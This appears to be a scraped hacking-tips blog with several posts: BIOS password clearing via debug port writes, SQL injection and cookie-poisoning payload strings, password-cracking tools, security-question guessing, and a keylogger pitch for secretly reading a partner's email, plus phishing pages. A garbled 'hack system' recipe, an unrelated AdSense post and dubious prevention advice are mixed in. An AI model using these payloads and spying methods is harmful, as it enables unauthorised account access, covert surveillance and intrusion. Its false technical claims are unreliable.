Best way to Crack the BIOS password

| comments


There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.

Follow the steps below:

[eminimall]

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine

password protection gone!!!!!!!!!!!!!

EnjoYYYYYYYYYY

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data……….

The use of this code is entirely at ur risk……….

It worked fine for me……….

Web Sites Hacking Methods

| comments


Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on somecommon website hacking methods.

The Simple SQL Injection Hack
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.
In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a User name field:
' OR 1=1 double-dash-txt.png
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ‘USRTEXT '
AND password = ‘PASSTEXT’
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ‘' OR 1=1 — 'AND password = '’
Two things you need to know about this:
['] closes the [user-name] text field.
'double-dash-txt.png' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE user name = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank,
evidently

But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:

    * admin'—
    * ') or ('a'='a
    * ”) or (“a”=”a
    * hi” or “a”=”a

… and so on.
 
Cross site scripting ( XSS ):
Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

Denial of service ( Ddos attack ):
A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a website but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking .

Cookie Poisoning:
Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection
Both have 'OR'1'='1 or maybe '1'='1'
But in cookie poisoning you begin with alerting your cookies
Javascript:alert(document.cookie)
Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"
in this case the cookie poisoning could be:
Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");
It is also many versions of this kind... like for example
'
'1'='1'
'OR'1'='1
'OR'1'='1'OR'
and so on...
You may have to try 13 things before you get it completely right...

Password Cracking
Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

A Few Defensive Measures
* If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web formsor enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes.

READ MORE!

USE FORGOT PASSWORD RECOVERY TO HACK EMAIL ACCOUNTS

| comments


Passwords can sometimes be guessed by humans with knowledge of the user’s personal information. Examples of guessable passwords include:

    * blank (none)
    * the words “password”, “passcode”, “admin” and their derivatives
    * a row of letters from the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)
    * the user’s name or login name
    * the name of a significant other, a friend, relative or pet
    * their birthplace or date of birth, or a friend’s, or a relative’s
    * their automobile license plate number, or a friend’s, or a relative’s
    * their office number, residence number or most commonly, their mobile number.
    * a name of a celebrity they like
    * a simple modification of one of the preceding, such as suffixing a digit, particularly 1, or reversing the order of the letters.
    * swear word

Personal data about individuals are now available from various sources, many on-line, and can often be obtained by someone using social engineering techniques, such as posing as an opinion surveyor or a security control checker. Attackers who know the user may have information as well. For example, if a user chooses the password “YaleLaw78″ because he graduated from Yale Law School in 1978, a disgruntled business partner might be able to guess the password.
For example, in September 2008, the Yahoo e-mail account of Governor of Alaska and Vice President of the United States nominee Sarah Palin was accessed without authorization by someone who was able to research answers to two of her security questions, her zip code and date of birth and was able to guess the third, where she met her husband.
How to use Forgot Password Recovery
Using Password Recovery forms is easy. You just click the “Forgot Password” link and are taken to a series of personal questions like :

    * Username
    * Date of Birth
    * Answer Security Question
    * PIN Code

Now, all the above details are easy to obtain. The only difficult part is guessing security question’s answer.

CRACK THE ADMINISTRATOR WITH THESE TOOLS

| comments


There are already so many articles written on how to recover or reset a password that I’m not going to reinvent the wheel, but instead will guide you to the best online resources that I used to crack my Windows XP password.

1. Ophcrack Live CD – My favorite ways to blank out or crack a Windows password is to use a Linux Live CD. These are special distributions of Linux that run directly from the CD (no installation required) and are specially designed for cracking Windows passwords. You can read the documentation to learn how to use it. Simply burn the ISO and boot using the CD and the program will get right to work. It won’t work, however, on very complicated password because it actually tries to determine the password rather than reset it.

2. Offline NT Password and Registry Editor – This is a very small program, only 3MB in size, that you can burn to a CD and boot to. It’ll auto-detect the Windows installation and the account names (that is if everything was installed in the default Windows directories). Using this program you can reset or blank out a Windows password, which means it doesn’t matter how long or complicated it is. I tried this program on Vista and it would not load afterwards, so definitely only use for Windows XP or earlier!

3. Login Recovery – Login Recovery is a web site that has a program that you can either download onto a floppy disk or a cd and that you use to boot up with. You’ll get a list of account and some numbers when the program runs. Take those numbers and enter them onto the web site and Login Recovery will crunch it through it’s system to find out password for Windows NT, 2000, XP and Vista. I have tried this site and it did not work for my password, which was 11 characters and mostly symbols, numbers, and letters. However, if the password was something simple, they will probably be able to crack it.

4. John The Ripper – Another free password cracker that works on Windows, Linux and Macs, so it’s useful for any Mac or Linux user who wants to recovery a password. Pretty easy to use and comes with good instructions, so most people can follow along.

5. Knoppix STD – G4TV has a good article on another Linux distro you can download and use to crack your Windows password. Follow the detailed instructions he gives and if the password is not too long or difficult, it should be able to crack it!

As you can tell, the best ways to crack a Windows password is using Linux! It might be a little too techie for some people, but it’s definitely worth it if you want to avoid having to re-install Windows and lose all of your data! Any questions, post a comment!

How to Hack Email

| comments


I know most of you might be wondering to know how tohack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the lies.

Is it Possible to Hack Email?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.
1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come accross any website that claims to sell such softwares, I would advise you not to trust them.
2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.
3. With my experience of over 8 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.
The following are the only 2 working and foolproof methods to hack any email.

1. HACK ANY EMAIL: EASIEST WAY
The easiest way to hack an email is by using a keylogger (Also known as spy software). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keylogger as the best for hacking email.

- The No.1 Keylogger to Access any Email

SniperSpy is a revolutionary software that allows you to easilyaccess *ANY* email account or password protected material such as MySpace or Facebook. There are absolutely *NO* limitations to what accounts or websites this software can access!


§  SniperSpy – For Windows

§  SniperSpy – For Mac

Can I install SniperSpy on a Local Computer?
Yes, you can install SniperSpy on a Local or Remote computer. It supports both Remote and Local installations. So you need not worry whether it is a local or remote PC.

Can I be traced back if I install SniperSpy on a Remote Computer?
No, it is impossible to trace back to you when you install it on a remote computer.

2. OTHER WAYS TO HACK EMAIL

The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details (username and password) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers to hack email since it’s the easiest one.

I hope this info has helped you. Happy Email Hacking!!!!!!!!!!!!!

hack system

| comments


Well as i already mentioned u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

steps: -

1.Download software PORT SCANNER.
2.Copy the ip address of the victim whose port is open.
3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing internet....
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.
5.you can download netlab 1.4 and port scanner softwares from www.piratebay.com and torrentz also.

Google Adsense Approval triks

| comments

adsence approval tricks

ADSENSE APPROVAL THROUGH FREE  DOMAINS
Now a days bloggers are not get approved for adsense program due to heavy traffic in participation as a publisher in adsense. thus adsense has started making strict and standard
valuation of the site.
so mostly domains are approved now a day. if the person feel than domains are costly.
there are some google friendly domains. which too can be used such domain in co.cc
which can be used as DNS,A,MX and CNAME records, thus the blog users can change their name to this domain (blogname.co.cc) instead of blogname.blogspot.com
free domain setup is simple. just follow the steps below


1.Goto ur browser and open to co.cc
2.type for a free domain which u want to use and see wheather it is avaluable
3.if ur desired name is avaluable make a register to it.
4.next step u have to setup for a domain to do so goto "setup--->manage domain"
5.select "zone records" in that column "host" type your domain name (www.yourdomainname.co.cc)
6.then choose "CNAME" for "TYPE" then type "ghs.google.com" in the value box then click
setup button.


next think to do in blogger do as follow:


1.goto to blogger.com and login.
2.select "setting--->publishing" then select "switch to :. custom domain"
3.then click on that "already own a domain:switch to advance setting"
4.In "your domain" column type ur domain name which u have created in co.cc
5.click" save setting " button to finish.


note: it take nearly 1-2days for ur new domain to take action. mean while if any one entering to ur site through blospot. it will be redirected to ur new domain name
enjoy...

Website Hacking Prevention

| comments


Website creation is a very popular activity on the internet. As more and more people discover the many possibilities of having their own website, more of these pages are being created on the internet. It is essential that a website is created in more than just a way that is attractive to visitors. It should also be protected in such a way that there is a higher level of security. There are many individuals who actually spend a majority of their time hacking various websites online. In this article, you will learn about the importance of website hacking prevention measures.

Website hackers use numerous kinds of computer programming languages in order to break down the security on websites on the internet. The most popular computer programming language that can be invaded is that which uses XXS. This is a cross scripting type of computer language that is often used to cross websites. When creating your online website, it is essential that you ensure that all fields and other areas of the website are properly protected from the potential hacker.

Many website owners have a special area on their website where they attempt to gather personal information from the visitors. This may include gathering an email address, an address, and other types of information. It is important that this part of the website is properly protected from hackers. Not only can this type of hacking jeopardize your website, but it can also jeopardize the personal information that your visitors enter on the website. It is important for you to make sure that this part of your website is properly encrypted by HTML.

Many website hackers engage in a practice that is commonly referred to as "Google Hacking". Individuals who use this type of hacking often attempt to discover information about a particular website that is listed on Google by searching for information that is normally considered to be unauthorized. They will attempt to retrieve information that pertains to the tracking tools that are often used by website owners. This information, when in the wrong hands, can actually jeopardize your website.

Individuals who gain access to information on a website through Google hacking techniques may get access to the following information:
- The cache of the website
- Various types of files that are listed on the website
- The link that is used to promote the website
- The intitle and the inurl may also be accessed

Many website owners create their website in such a way that they can access the information across many platforms. However, this can prove to be a danger when it comes to website hackers. By using Google hacking techniques, the pages that are on the website can be easily hacked because the pages are often available for editing purposes. If there is a query made into the search engine, these pages can easily be accessed. If a hacker accesses this information, they can do virtually anything to your website pages. This can prove to cause you financial loss. This is especially true if the hacker places information on your website that can hurt your reputation.

Luckily, there are many techniques that website owners can use to prevent the possibility of hacking. First, the data that you use to compile your website pages should never be allowed to sit on a server. This information should be saved locally. This means that it should be saved to your computer. In turn, you should make sure that the computer is protected by a password that contains alphanumeric characters. This way, if someone attempts to access your computer system remotely, they will be unable to do so.

You should also ensure that the password that you use to make changes to your website is also secure. When saving the documents that are part of your website, it is important that you create them in such a way that others are unable to access this information. Many tips for this include integrating a "disallow" function on the website and attached to all the documents. By taking these steps, and being aware of what the dangers are when you do not, you are sure to prevent the possibility of hackers.
 
Support : INDIATRIKS
Copyright © 2011. INDIATRIKS - All Rights Reserved
Template Edited By Indiatriks
Proudly Powered By Blogger